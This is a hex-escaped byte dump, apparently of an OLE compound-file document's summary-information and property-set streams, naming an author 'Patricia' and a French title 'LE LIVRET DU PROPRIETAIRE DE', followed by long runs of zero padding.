-"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00" -"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" -"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" -"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x09\x00\x00\x00\x24\x03\x00\x00\x00\x00\x00\x00" -"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x11\x00\x00\x03\x00\x00\x00" -"\x0c\x62\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00" -"\x09\x00\x00\x00\x50\x61\x74\x72\x69\x63\x69\x61\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\xd5\xcd\xd5" -"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x44\x00\x00\x00" -"\x05\xd5\xcd\xd5\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae" -"\x4c\x01\x00\x00\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00" -"\x68\x00\x00\x00\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00" -"\x80\x00\x00\x00\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00" -"\x90\x00\x00\x00\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00" -"\xa0\x00\x00\x00\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00" -"\xb0\x00\x00\x00\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00" -"\xc0\x00\x00\x00\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00" -"\xe4\x04\x00\x00\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a" -"\x00\x00\x45\x00\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00" -"\x3b\x00\x00\x00\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00" -"\x41\x0a\x0a\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00" -"\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00" -"\x00\x00\x00\x00\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00" 
-"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f" -"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00" -"\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74" -"\x72\x65\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xd8\x01\x00\x00" -"\x07\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x01\x00\x00\x00" -"\xf4\x00\x00\x00\x00\x00\x00\x80\xfc\x00\x00\x00\x02\x00\x00\x00" -"\x04\x01\x00\x00\x03\x00\x00\x00\x0c\x01\x00\x00\x04\x00\x00\x00" -"\x74\x01\x00\x00\x05\x00\x00\x00\xb0\x01\x00\x00\x04\x00\x00\x00" -"\x02\x00\x00\x00\x14\x00\x00\x00\x5f\x00\x41\x00\x64\x00\x48\x00" -"\x6f\x00\x63\x00\x52\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00" -"\x43\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x49\x00\x44\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xd5\xcd\xd5" -"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x30\x00\x00\x00" -"\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00" -"\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00\x80\x00\x00\x00" -"\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00\x90\x00\x00\x00" -"\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00\xa0\x00\x00\x00" -"\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00\xb0\x00\x00\x00" -"\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00\xc0\x00\x00\x00" -"\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00" -"\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a\x00\x00\x45\x00" -"\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00\x3b\x00\x00\x00" 
-"\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00\x41\x0a\x0a\x00" -"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00" -"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00" -"\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00\x4c\x45\x20\x4c" -"\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f\x50\x52\x49\x45" -"\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00\x00\x02\x00\x00" -"\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74\x72\x65\x00\x03" -"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 